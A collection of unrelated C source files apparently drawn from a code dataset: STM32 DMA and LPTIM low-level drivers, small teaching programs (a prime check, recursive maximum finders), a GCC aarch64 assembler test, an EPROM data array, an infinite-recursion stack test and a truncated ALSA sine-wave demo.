LL_DMA_DIRECTION_MEMORY_TO_PERIPH) || \ ((__VALUE__) == LL_DMA_DIRECTION_MEMORY_TO_MEMORY)) #define IS_LL_DMA_MODE(__VALUE__) (((__VALUE__) == LL_DMA_MODE_NORMAL) || \ ((__VALUE__) == LL_DMA_MODE_CIRCULAR)) #define IS_LL_DMA_PERIPHINCMODE(__VALUE__) (((__VALUE__) == LL_DMA_PERIPH_INCREMENT) || \ ((__VALUE__) == LL_DMA_PERIPH_NOINCREMENT)) #define IS_LL_DMA_MEMORYINCMODE(__VALUE__) (((__VALUE__) == LL_DMA_MEMORY_INCREMENT) || \ ((__VALUE__) == LL_DMA_MEMORY_NOINCREMENT)) #define IS_LL_DMA_PERIPHDATASIZE(__VALUE__) (((__VALUE__) == LL_DMA_PDATAALIGN_BYTE) || \ ((__VALUE__) == LL_DMA_PDATAALIGN_HALFWORD) || \ ((__VALUE__) == LL_DMA_PDATAALIGN_WORD)) #define IS_LL_DMA_MEMORYDATASIZE(__VALUE__) (((__VALUE__) == LL_DMA_MDATAALIGN_BYTE) || \ ((__VALUE__) == LL_DMA_MDATAALIGN_HALFWORD) || \ ((__VALUE__) == LL_DMA_MDATAALIGN_WORD)) #define IS_LL_DMA_NBDATA(__VALUE__) ((__VALUE__) <= (uint32_t)0x0000FFFFU) #define IS_LL_DMA_PERIPHREQUEST(__VALUE__) (((__VALUE__) == LL_DMA_REQUEST_0) || \ ((__VALUE__) == LL_DMA_REQUEST_1) || \ ((__VALUE__) == LL_DMA_REQUEST_2) || \ ((__VALUE__) == LL_DMA_REQUEST_3) || \ ((__VALUE__) == LL_DMA_REQUEST_4) || \ ((__VALUE__) == LL_DMA_REQUEST_5) || \ ((__VALUE__) == LL_DMA_REQUEST_6) || \ ((__VALUE__) == LL_DMA_REQUEST_7)) #define IS_LL_DMA_PRIORITY(__VALUE__) (((__VALUE__) == LL_DMA_PRIORITY_LOW) || \ ((__VALUE__) == LL_DMA_PRIORITY_MEDIUM) || \ ((__VALUE__) == LL_DMA_PRIORITY_HIGH) || \ ((__VALUE__) == LL_DMA_PRIORITY_VERYHIGH)) #if defined (DMA2) #if defined (DMA2_Channel6) && defined (DMA2_Channel7) #define IS_LL_DMA_ALL_CHANNEL_INSTANCE(INSTANCE, CHANNEL) ((((INSTANCE) == DMA1) && \ (((CHANNEL) == LL_DMA_CHANNEL_1) || \ ((CHANNEL) == LL_DMA_CHANNEL_2) || \ ((CHANNEL) == LL_DMA_CHANNEL_3) || \ ((CHANNEL) == LL_DMA_CHANNEL_4) || \ ((CHANNEL) == LL_DMA_CHANNEL_5) || \ ((CHANNEL) == LL_DMA_CHANNEL_6) || \ ((CHANNEL) == LL_DMA_CHANNEL_7))) || \ (((INSTANCE) == DMA2) && \ (((CHANNEL) == LL_DMA_CHANNEL_1) || \ ((CHANNEL) == LL_DMA_CHANNEL_2) || \ ((CHANNEL) == LL_DMA_CHANNEL_3) || \ ((CHANNEL) == LL_DMA_CHANNEL_4) || \ ((CHANNEL) == LL_DMA_CHANNEL_5) || \ ((CHANNEL) == LL_DMA_CHANNEL_6) || \ ((CHANNEL) == LL_DMA_CHANNEL_7)))) #else #define IS_LL_DMA_ALL_CHANNEL_INSTANCE(INSTANCE, CHANNEL) ((((INSTANCE) == DMA1) && \ (((CHANNEL) == LL_DMA_CHANNEL_1) || \ ((CHANNEL) == LL_DMA_CHANNEL_2) || \ ((CHANNEL) == LL_DMA_CHANNEL_3) || \ ((CHANNEL) == LL_DMA_CHANNEL_4) || \ ((CHANNEL) == LL_DMA_CHANNEL_5) || \ ((CHANNEL) == LL_DMA_CHANNEL_6) || \ ((CHANNEL) == LL_DMA_CHANNEL_7))) || \ (((INSTANCE) == DMA2) && \ (((CHANNEL) == LL_DMA_CHANNEL_1) || \ ((CHANNEL) == LL_DMA_CHANNEL_2) || \ ((CHANNEL) == LL_DMA_CHANNEL_3) || \ ((CHANNEL) == LL_DMA_CHANNEL_4) || \ ((CHANNEL) == LL_DMA_CHANNEL_5)))) #endif #else #define IS_LL_DMA_ALL_CHANNEL_INSTANCE(INSTANCE, CHANNEL) ((((INSTANCE) == DMA1) && \ (((CHANNEL) == LL_DMA_CHANNEL_1)|| \ ((CHANNEL) == LL_DMA_CHANNEL_2) || \ ((CHANNEL) == LL_DMA_CHANNEL_3) || \ ((CHANNEL) == LL_DMA_CHANNEL_4) || \ ((CHANNEL) == LL_DMA_CHANNEL_5) || \ ((CHANNEL) == LL_DMA_CHANNEL_6) || \ ((CHANNEL) == LL_DMA_CHANNEL_7)))) #endif /** * @} */ /* Private function prototypes -----------------------------------------------*/ /* Exported functions --------------------------------------------------------*/ /** @addtogroup DMA_LL_Exported_Functions * @{ */ /** @addtogroup DMA_LL_EF_Init * @{ */ /** * @brief De-initialize the DMA registers to their default reset values. * @param DMAx DMAx Instance * @param Channel This parameter can be one of the following values: * @arg @ref LL_DMA_CHANNEL_1 * @arg @ref LL_DMA_CHANNEL_2 * @arg @ref LL_DMA_CHANNEL_3 * @arg @ref LL_DMA_CHANNEL_4 * @arg @ref LL_DMA_CHANNEL_5 * @arg @ref LL_DMA_CHANNEL_6 * @arg @ref LL_DMA_CHANNEL_7 * @arg @ref LL_DMA_CHANNEL_ALL * @retval An ErrorStatus enumeration value: * - SUCCESS: DMA registers are de-initialized * - ERROR: DMA registers are not de-initialized */ uint32_t LL_DMA_DeInit(DMA_TypeDef *DMAx, uint32_t Channel) { DMA_Channel_TypeDef *tmp = (DMA_Channel_TypeDef *)DMA1_Channel1; ErrorStatus status = SUCCESS; /* Check the DMA Instance DMAx and Channel parameters*/ assert_param(IS_LL_DMA_ALL_CHANNEL_INSTANCE(DMAx, Channel) || (Channel == LL_DMA_CHANNEL_ALL)); if (Channel == LL_DMA_CHANNEL_ALL) { if (DMAx == DMA1) { /* Force reset of DMA clock */ LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_DMA1); /* Release reset of DMA clock */ LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_DMA1); } #if defined(DMA2) else if (DMAx == DMA2) { /* Force reset of DMA clock */ LL_AHB1_GRP1_ForceReset(LL_AHB1_GRP1_PERIPH_DMA2); /* Release reset of DMA clock */ LL_AHB1_GRP1_ReleaseReset(LL_AHB1_GRP1_PERIPH_DMA2); } #endif else { status = ERROR; } } else { tmp = (DMA_Channel_TypeDef *)(__LL_DMA_GET_CHANNEL_INSTANCE(DMAx, Channel)); /* Disable the selected DMAx_Channely */ CLEAR_BIT(tmp->CCR, DMA_CCR_EN); /* Reset DMAx_Channely control register */ LL_DMA_WriteReg(tmp, CCR, 0U); /* Reset DMAx_Channely remaining bytes register */ LL_DMA_WriteReg(tmp, CNDTR, 0U); /* Reset DMAx_Channely peripheral address register */ LL_DMA_WriteReg(tmp, CPAR, 0U); /* Reset DMAx_Channely memory address register */ LL_DMA_WriteReg(tmp, CMAR, 0U); /* Reset Request register field for DMAx Channel */ LL_DMA_SetPeriphRequest(DMAx, Channel, LL_DMA_REQUEST_0); if (Channel == LL_DMA_CHANNEL_1) { /* Reset interrupt pending bits for DMAx Channel1 */ LL_DMA_ClearFlag_GI1(DMAx); } else if (Channel == LL_DMA_CHANNEL_2) { /* Reset interrupt pending bits for DMAx Channel2 */ LL_DMA_ClearFlag_GI2(DMAx); } else if (Channel == LL_DMA_CHANNEL_3) { /* Reset interrupt pending bits for DMAx Channel3 */ LL_DMA_ClearFlag_GI3(DMAx); } else if (Channel == LL_DMA_CHANNEL_4) { /* Reset interrupt pending bits for DMAx Channel4 */ LL_DMA_ClearFlag_GI4(DMAx); } else if (Channel == LL_DMA_CHANNEL_5) { /* Reset interrupt pending bits for DMAx Channel5 */ LL_DMA_ClearFlag_GI5(DMAx); } else if (Channel == LL_DMA_CHANNEL_6) { /* Reset interrupt pending bits for DMAx Channel6 */ LL_DMA_ClearFlag_GI6(DMAx); } else if (Channel == LL_DMA_CHANNEL_7) { /* Reset interrupt pending bits for DMAx Channel7 */ LL_DMA_ClearFlag_GI7(DMAx); } else { status = ERROR; } } return status; } /** * @brief Initialize the DMA registers according to the specified parameters in DMA_InitStruct. * @note To convert DMAx_Channely Instance to DMAx Instance and Channely, use helper macros : * @arg @ref __LL_DMA_GET_INSTANCE * @arg @ref __LL_DMA_GET_CHANNEL * @param DMAx DMAx Instance * @param Channel This parameter can be one of the following values: * @arg @ref LL_DMA_CHANNEL_1 * @arg @ref LL_DMA_CHANNEL_2 * @arg @ref LL_DMA_CHANNEL_3 * @arg @ref LL_DMA_CHANNEL_4 * @arg @ref LL_DMA_CHANNEL_5 * @arg @ref LL_DMA_CHANNEL_6 * @arg @ref LL_DMA_CHANNEL_7 * @param DMA_InitStruct pointer to a @ref LL_DMA_InitTypeDef structure. * @retval An ErrorStatus enumeration value: * - SUCCESS: DMA registers are initialized * - ERROR: Not applicable */ uint32_t LL_DMA_Init(DMA_TypeDef *DMAx, uint32_t Channel, LL_DMA_InitTypeDef *DMA_InitStruct) { /* Check the DMA Instance DMAx and Channel parameters*/ assert_param(IS_LL_DMA_ALL_CHANNEL_INSTANCE(DMAx, Channel)); /* Check the DMA parameters from DMA_InitStruct */ assert_param(IS_LL_DMA_DIRECTION(DMA_InitStruct->Direction)); assert_param(IS_LL_DMA_MODE(DMA_InitStruct->Mode)); assert_param(IS_LL_DMA_PERIPHINCMODE(DMA_InitStruct->PeriphOrM2MSrcIncMode)); assert_param(IS_LL_DMA_MEMORYINCMODE(DMA_InitStruct->MemoryOrM2MDstIncMode)); assert_param(IS_LL_DMA_PERIPHDATASIZE(DMA_InitStruct->PeriphOrM2MSrcDataSize)); assert_param(IS_LL_DMA_MEMORYDATASIZE(DMA_InitStruct->MemoryOrM2MDstDataSize)); assert_param(IS_LL_DMA_NBDATA(DMA_InitStruct->NbData)); assert_param(IS_LL_DMA_PERIPHREQUEST(DMA_InitStruct->PeriphRequest)); assert_param(IS_LL_DMA_PRIORITY(DMA_InitStruct->Priority)); /*---------------------------- DMAx CCR Configuration ------------------------ * Configure DMAx_Channely: data transfer direction, data transfer mode, * peripheral and memory increment mode, * data size alignment and priority level with parameters : * - Direction: DMA_CCR_DIR and DMA_CCR_MEM2MEM bits * - Mode: DMA_CCR_CIRC bit * - PeriphOrM2MSrcIncMode: DMA_CCR_PINC bit * - MemoryOrM2MDstIncMode: DMA_CCR_MINC bit * - PeriphOrM2MSrcDataSize: DMA_CCR_PSIZE[1:0] bits * - MemoryOrM2MDstDataSize: DMA_CCR_MSIZE[1:0] bits * - Priority: DMA_CCR_PL[1:0] bits */ LL_DMA_ConfigTransfer(DMAx, Channel, DMA_InitStruct->Direction | \ DMA_InitStruct->Mode | \ DMA_InitStruct->PeriphOrM2MSrcIncMode | \ DMA_InitStruct->MemoryOrM2MDstIncMode | \ DMA_InitStruct->PeriphOrM2MSrcDataSize | \ DMA_InitStruct->MemoryOrM2MDstDataSize | \ DMA_InitStruct->Priority); /*-------------------------- DMAx CMAR Configuration ------------------------- * Configure the memory or destination base address with parameter : * - MemoryOrM2MDstAddress: DMA_CMAR_MA[31:0] bits */ LL_DMA_SetMemoryAddress(DMAx, Channel, DMA_InitStruct->MemoryOrM2MDstAddress); /*-------------------------- DMAx CPAR Configuration ------------------------- * Configure the peripheral or source base address with parameter : * - PeriphOrM2MSrcAddress: DMA_CPAR_PA[31:0] bits */ LL_DMA_SetPeriphAddress(DMAx, Channel, DMA_InitStruct->PeriphOrM2MSrcAddress); /*--------------------------- DMAx CNDTR Configuration ----------------------- * Configure the peripheral base address with parameter : * - NbData: DMA_CNDTR_NDT[15:0] bits */ LL_DMA_SetDataLength(DMAx, Channel, DMA_InitStruct->NbData); /*--------------------------- DMAx CSELR Configuration ----------------------- * Configure the peripheral base address with parameter : * - PeriphRequest: DMA_CSELR[31:0] bits */ LL_DMA_SetPeriphRequest(DMAx, Channel, DMA_InitStruct->PeriphRequest); return SUCCESS; } /** * @brief Set each @ref LL_DMA_InitTypeDef field to default value. * @param DMA_InitStruct Pointer to a @ref LL_DMA_InitTypeDef structure. * @retval None */ void LL_DMA_StructInit(LL_DMA_InitTypeDef *DMA_InitStruct) { /* Set DMA_InitStruct fields to default values */ DMA_InitStruct->PeriphOrM2MSrcAddress = (uint32_t)0x00000000U; DMA_InitStruct->MemoryOrM2MDstAddress = (uint32_t)0x00000000U; DMA_InitStruct->Direction = LL_DMA_DIRECTION_PERIPH_TO_MEMORY; DMA_InitStruct->Mode = LL_DMA_MODE_NORMAL; DMA_InitStruct->PeriphOrM2MSrcIncMode = LL_DMA_PERIPH_NOINCREMENT; DMA_InitStruct->MemoryOrM2MDstIncMode = LL_DMA_MEMORY_NOINCREMENT; DMA_InitStruct->PeriphOrM2MSrcDataSize = LL_DMA_PDATAALIGN_BYTE; DMA_InitStruct->MemoryOrM2MDstDataSize = LL_DMA_MDATAALIGN_BYTE; DMA_InitStruct->NbData = (uint32_t)0x00000000U; DMA_InitStruct->PeriphRequest = LL_DMA_REQUEST_0; DMA_InitStruct->Priority = LL_DMA_PRIORITY_LOW; } /** * @} */ /** * @} */ /** * @} */ #endif /* DMA1 || DMA2 */ /** * @} */ #endif /* USE_FULL_LL_DRIVER */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
the_stack_data/64200531.c
#include<stdio.h> int main() { int n1, i; printf("Enter a number:\n"); scanf("%d", &n1); for(i=2;i<=n1-1;i++) if(n1%i==0) break; if(i==n1) printf("%d is a prime number:\n", n1); else printf("%d is not a prime number:\n", n1); }
the_stack_data/132953452.c
/* * Exemplos de funções para achar maior número de um vetor * As 3 são recursivas porém apenas a MaxDC utiliza divisão e conquista * Kelvin Salton do Prado - 2015 */ #include <stdio.h> #include <stdlib.h> #define MAX 10 // Maximo usando Divisão e Conquista int MaxDC(int *vetor, int inicio, int fim) { int aux1, aux2; int meio = ( inicio + fim ) / 2; if( inicio == fim ) { return vetor[inicio]; } aux1 = MaxDC(vetor, inicio, meio); aux2 = MaxDC(vetor, meio+1, fim); if( aux1 > aux2 ) { return aux1; } else { return aux2; } } void max1(int *vetor, int maximo, int indice) { if( vetor[indice] > maximo ) { maximo = vetor[indice]; } if( indice < MAX-1 ) { max1(vetor, maximo, indice+1); } else { printf("\n\nMax1: %d\n",maximo); } } int max2(int vetor[], int tamVetor) { if (tamVetor == 1) { return vetor[0]; // só tem 1 elemento } else { int x = max2(vetor, tamVetor-1); if (x > vetor[tamVetor-1]) { return x; } else { return vetor[tamVetor-1]; } } } int main() { int vetor[MAX]; for (int i = 0; i < MAX; ++i) { vetor[i] = (rand() % 90) + 10; // 10 a 99 printf("%d, ", vetor[i]); } max1(vetor, vetor[0], 1); printf("\nMax2: %d\n", max2(vetor, MAX) ); printf("\nMaxDC: %d\n\n", MaxDC(vetor, 0, MAX-1) ); return 0; }
the_stack_data/1124970.c
/** ****************************************************************************** * @file stm32l0xx_ll_lptim.c * @author MCD Application Team * @version V1.8.1 * @date 14-April-2017 * @brief LPTIM LL module driver. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT(c) 2016 STMicroelectronics</center></h2> * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of STMicroelectronics nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************** */ #if defined(USE_FULL_LL_DRIVER) /* Includes ------------------------------------------------------------------*/ #include "stm32l0xx_ll_lptim.h" #include "stm32l0xx_ll_bus.h" #ifdef USE_FULL_ASSERT #include "stm32_assert_template.h" #else #define assert_param(expr) ((void)0U) #endif /** @addtogroup STM32L0xx_LL_Driver * @{ */ #if defined (LPTIM1) || defined (LPTIM2) /** @addtogroup LPTIM_LL * @{ */ /* Private types -------------------------------------------------------------*/ /* Private variables ---------------------------------------------------------*/ /* Private constants ---------------------------------------------------------*/ /* Private macros ------------------------------------------------------------*/ /** @addtogroup LPTIM_LL_Private_Macros * @{ */ #define IS_LPTIM_CLOCK_SOURCE(__VALUE__) (((__VALUE__) == LL_LPTIM_CLK_SOURCE_INTERNAL) \ || ((__VALUE__) == LL_LPTIM_CLK_SOURCE_EXTERNAL)) #define IS_LPTIM_CLOCK_PRESCALER(__VALUE__) (((__VALUE__) == LL_LPTIM_PRESCALER_DIV1) \ || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV2) \ || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV4) \ || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV8) \ || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV16) \ || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV32) \ || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV64) \ || ((__VALUE__) == LL_LPTIM_PRESCALER_DIV128)) #define IS_LPTIM_WAVEFORM(__VALUE__) (((__VALUE__) == LL_LPTIM_OUTPUT_WAVEFORM_PWM) \ || ((__VALUE__) == LL_LPTIM_OUTPUT_WAVEFORM_SETONCE)) #define IS_LPTIM_OUTPUT_POLARITY(__VALUE__) (((__VALUE__) == LL_LPTIM_OUTPUT_POLARITY_REGULAR) \ || ((__VALUE__) == LL_LPTIM_OUTPUT_POLARITY_INVERSE)) /** * @} */ /* Private function prototypes -----------------------------------------------*/ /* Exported functions --------------------------------------------------------*/ /** @addtogroup LPTIM_LL_Exported_Functions * @{ */ /** @addtogroup LPTIM_LL_EF_Init * @{ */ /** * @brief Set LPTIMx registers to their reset values. * @param LPTIMx LP Timer instance * @retval An ErrorStatus enumeration value: * - SUCCESS: LPTIMx registers are de-initialized * - ERROR: invalid LPTIMx instance */ ErrorStatus LL_LPTIM_DeInit(LPTIM_TypeDef* LPTIMx) { ErrorStatus result = SUCCESS; /* Check the parameters */ assert_param(IS_LPTIM_INSTANCE(LPTIMx)); if (LPTIMx == LPTIM1) { LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_LPTIM1); LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_LPTIM1); } #if defined(LPTIM2) else if (LPTIMx == LPTIM2) { LL_APB1_GRP2_ForceReset(LL_APB1_GRP2_PERIPH_LPTIM2); LL_APB1_GRP2_ReleaseReset(LL_APB1_GRP2_PERIPH_LPTIM2); } #endif else { result = ERROR; } return result; } /** * @brief Set each fields of the LPTIM_InitStruct structure to its default * value. * @param LPTIM_InitStruct pointer to a @ref LL_LPTIM_InitTypeDef structure * @retval None */ void LL_LPTIM_StructInit(LL_LPTIM_InitTypeDef* LPTIM_InitStruct) { /* Set the default configuration */ LPTIM_InitStruct->ClockSource = LL_LPTIM_CLK_SOURCE_INTERNAL; LPTIM_InitStruct->Prescaler = LL_LPTIM_PRESCALER_DIV1; LPTIM_InitStruct->Waveform = LL_LPTIM_OUTPUT_WAVEFORM_PWM; LPTIM_InitStruct->Polarity = LL_LPTIM_OUTPUT_POLARITY_REGULAR; } /** * @brief Configure the LPTIMx peripheral according to the specified parameters. * @note LL_LPTIM_Init can only be called when the LPTIM instance is disabled. * @note LPTIMx can be disabled using unitary function @ref LL_LPTIM_Disable(). * @param LPTIMx LP Timer Instance * @param LPTIM_InitStruct pointer to a @ref LL_LPTIM_InitTypeDef structure * @retval An ErrorStatus enumeration value: * - SUCCESS: LPTIMx instance has been initialized * - ERROR: LPTIMx instance hasn't been initialized */ ErrorStatus LL_LPTIM_Init(LPTIM_TypeDef * LPTIMx, LL_LPTIM_InitTypeDef* LPTIM_InitStruct) { ErrorStatus result = SUCCESS; /* The LPTIMx_CFGR register must only be modified when the LPTIM is disabled (ENABLE bit is reset to 0). */ if (LL_LPTIM_IsEnabled(LPTIMx)) { result = ERROR; } else { /* Check the parameters */ assert_param(IS_LPTIM_INSTANCE(LPTIMx)); assert_param(IS_LPTIM_CLOCK_SOURCE(LPTIM_InitStruct->ClockSource)); assert_param(IS_LPTIM_CLOCK_PRESCALER(LPTIM_InitStruct->Prescaler)); assert_param(IS_LPTIM_WAVEFORM(LPTIM_InitStruct->Waveform)); assert_param(IS_LPTIM_OUTPUT_POLARITY(LPTIM_InitStruct->Polarity)); /* Set CKSEL bitfield according to ClockSource value */ /* Set PRESC bitfield according to Prescaler value */ /* Set WAVE bitfield according to Waveform value */ /* Set WAVEPOL bitfield according to Polarity value */ MODIFY_REG(LPTIMx->CFGR, (LPTIM_CFGR_CKSEL | LPTIM_CFGR_PRESC | LPTIM_CFGR_WAVE| LPTIM_CFGR_WAVPOL), LPTIM_InitStruct->ClockSource | \ LPTIM_InitStruct->Prescaler | \ LPTIM_InitStruct->Waveform | \ LPTIM_InitStruct->Polarity); } return result; } /** * @} */ /** * @} */ /** * @} */ #endif /* defined (LPTIM1) || defined (LPTIM2) */ /** * @} */ #endif /* USE_FULL_LL_DRIVER */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
the_stack_data/161080952.c
void a() { char xxx[1024 * 1024] = {1}; a(); } int main(void) { a(); return 0; }
the_stack_data/1063789.c
/* { dg-do compile } */ /* { dg-options "-O2" } */ int ldr_uxtw (int *arr, unsigned int i) { /* { dg-final { scan-assembler "ldr\tw\[0-9\]+,.*uxtw #?2]" } } */ return arr[i]; } int ldr_uxtw0 (char *arr, unsigned int i) { /* { dg-final { scan-assembler "ldr\tw\[0-9\]+,.*uxtw]" } } */ return arr[i]; } int ldr_sxtw (int *arr, int i) { /* { dg-final { scan-assembler "ldr\tw\[0-9\]+,.*sxtw #?2]" } } */ return arr[i]; } int ldr_sxtw0 (char *arr, int i) { /* { dg-final { scan-assembler "ldr\tw\[0-9\]+,.*sxtw]" } } */ return arr[i]; } unsigned long long adddi_uxtw (unsigned long long a, unsigned int i) { /* { dg-final { scan-assembler "add\tx\[0-9\]+,.*uxtw #?3" } } */ return a + ((unsigned long long)i << 3); } unsigned long long adddi_uxtw0 (unsigned long long a, unsigned int i) { /* { dg-final { scan-assembler "add\tx\[0-9\]+,.*uxtw\n" } } */ return a + i; } long long adddi_sxtw (long long a, int i) { /* { dg-final { scan-assembler "add\tx\[0-9\]+,.*sxtw #?3" } } */ return a + ((long long)i << 3); } long long adddi_sxtw0 (long long a, int i) { /* { dg-final { scan-assembler "add\tx\[0-9\]+,.*sxtw\n" } } */ return a + i; } unsigned long long subdi_uxtw (unsigned long long a, unsigned int i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*uxtw #?3" } } */ return a - ((unsigned long long)i << 3); } unsigned long long subdi_uxtw0 (unsigned long long a, unsigned int i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*uxtw\n" } } */ return a - i; } long long subdi_sxtw (long long a, int i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*sxtw #?3" } } */ return a - ((long long)i << 3); } long long subdi_sxtw0 (long long a, int i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*sxtw\n" } } */ return a - (long long)i; } unsigned long long subdi_uxth (unsigned long long a, unsigned short i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*uxth #?1" } } */ return a - ((unsigned long long)i << 1); } unsigned long long subdi_uxth0 (unsigned long long a, unsigned short i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*uxth\n" } } */ return a - i; } long long subdi_sxth (long long a, short i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*sxth #?1" } } */ return a - ((long long)i << 1); } long long subdi_sxth0 (long long a, short i) { /* { dg-final { scan-assembler "sub\tx\[0-9\]+,.*sxth\n" } } */ return a - (long long)i; } unsigned int subsi_uxth (unsigned int a, unsigned short i) { /* { dg-final { scan-assembler "sub\tw\[0-9\]+,.*uxth #?1" } } */ return a - ((unsigned int)i << 1); } unsigned int subsi_uxth0 (unsigned int a, unsigned short i) { /* { dg-final { scan-assembler "sub\tw\[0-9\]+,.*uxth\n" } } */ return a - i; } int subsi_sxth (int a, short i) { /* { dg-final { scan-assembler "sub\tw\[0-9\]+,.*sxth #?1" } } */ return a - ((int)i << 1); } int subsi_sxth0 (int a, short i) { /* { dg-final { scan-assembler "sub\tw\[0-9\]+,.*sxth\n" } } */ return a - (int)i; } unsigned int addsi_uxth (unsigned int a, unsigned short i) { /* { dg-final { scan-assembler "add\tw\[0-9\]+,.*uxth #?1" } } */ return a + ((unsigned int)i << 1); } unsigned int addsi_uxth0 (unsigned int a, unsigned short i) { /* { dg-final { scan-assembler "add\tw\[0-9\]+,.*uxth\n" } } */ return a + i; } int addsi_sxth (int a, short i) { /* { dg-final { scan-assembler "add\tw\[0-9\]+,.*sxth #?1" } } */ return a + ((int)i << 1); } int addsi_sxth0 (int a, short i) { /* { dg-final { scan-assembler "add\tw\[0-9\]+,.*sxth\n" } } */ return a + (int)i; }
the_stack_data/198579453.c
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0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; const unsigned long eprom_termination = 0x00000000; const unsigned long eprom_start = 0x00000000; const unsigned long eprom_finish = 0x0000B000; const unsigned long eprom_length = 0x0000B000; #define EPROM_TERMINATION 0x00000000 #define EPROM_START 0x00000000 #define EPROM_FINISH 0x0000B000 #define EPROM_LENGTH 0x0000B000
the_stack_data/23576158.c
/* * This small demo sends a simple sinusoidal wave to your speakers. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sched.h> #include <errno.h> #include <getopt.h> #include "../include/asoundlib.h" #include <sys/time.h> #include <math.h> static char *device = "plughw:0,0"; /* playback device */ static snd_pcm_format_t format = SND_PCM_FORMAT_S16; /* sample format */ static unsigned int rate = 44100; /* stream rate */ static unsigned int channels = 1; /* count of channels */ static unsigned int buffer_time = 500000; /* ring buffer length in us */ static unsigned int period_time = 100000; /* period time in us */ static double freq = 440; /* sinusoidal wave frequency in Hz */ static int verbose = 0; /* verbose flag */ static int resample = 1; /* enable alsa-lib resampling */ static int period_event = 0; /* produce poll event after each period */ static snd_pcm_sframes_t buffer_size; static snd_pcm_sframes_t period_size; static snd_output_t *output = NULL; static void generate_sine(const snd_pcm_channel_area_t *areas, snd_pcm_uframes_t offset, int count, double *_phase) { static double max_phase = 2. * M_PI; double phase = *_phase; double step = max_phase*freq/(double)rate; unsigned char *samples[channels]; int steps[channels]; unsigned int chn; int format_bits = snd_pcm_format_width(format); unsigned int maxval = (1 << (format_bits - 1)) - 1; int bps = format_bits / 8; /* bytes per sample */ int phys_bps = snd_pcm_format_physical_width(format) / 8; int big_endian = snd_pcm_format_big_endian(format) == 1; int to_unsigned = snd_pcm_format_unsigned(format) == 1; int is_float = (format == SND_PCM_FORMAT_FLOAT_LE || format == SND_PCM_FORMAT_FLOAT_BE); /* verify and prepare the contents of areas */ for (chn = 0; chn < channels; chn++) { if ((areas[chn].first % 8) != 0) { printf("areas[%i].first == %i, aborting...\n", chn, areas[chn].first); exit(EXIT_FAILURE); } samples[chn] = /*(signed short *)*/(((unsigned char *)areas[chn].addr) + (areas[chn].first / 8)); if ((areas[chn].step % 16) != 0) { printf("areas[%i].step == %i, aborting...\n", chn, areas[chn].step); exit(EXIT_FAILURE); } steps[chn] = areas[chn].step / 8; samples[chn] += offset * steps[chn]; } /* fill the channel areas */ while (count-- > 0) { union { float f; int i; } fval; int res, i; if (is_float) { fval.f = sin(phase) * maxval; res = fval.i; } else res = sin(phase) * maxval; if (to_unsigned) res ^= 1U << (format_bits - 1); for (chn = 0; chn < channels; chn++) { /* Generate data in native endian format */ if (big_endian) { for (i = 0; i < bps; i++) *(samples[chn] + phys_bps - 1 - i) = (res >> i * 8) & 0xff; } else { for (i = 0; i < bps; i++) *(samples[chn] + i) = (res >> i * 8) & 0xff; } samples[chn] += steps[chn]; } phase += step; if (phase >= max_phase) phase -= max_phase; } *_phase = phase; } static int set_hwparams(snd_pcm_t *handle, snd_pcm_hw_params_t *params, snd_pcm_access_t access) { unsigned int rrate; snd_pcm_uframes_t size; int err, dir; /* choose all parameters */ err = snd_pcm_hw_params_any(handle, params); if (err < 0) { printf("Broken configuration for playback: no configurations available: %s\n", snd_strerror(err)); return err; } /* set hardware resampling */ err = snd_pcm_hw_params_set_rate_resample(handle, params, resample); if (err < 0) { printf("Resampling setup failed for playback: %s\n", snd_strerror(err)); return err; } /* set the interleaved read/write format */ err = snd_pcm_hw_params_set_access(handle, params, access); if (err < 0) { printf("Access type not available for playback: %s\n", snd_strerror(err)); return err; } /* set the sample format */ err = snd_pcm_hw_params_set_format(handle, params, format); if (err < 0) { printf("Sample format not available for playback: %s\n", snd_strerror(err)); return err; } /* set the count of channels 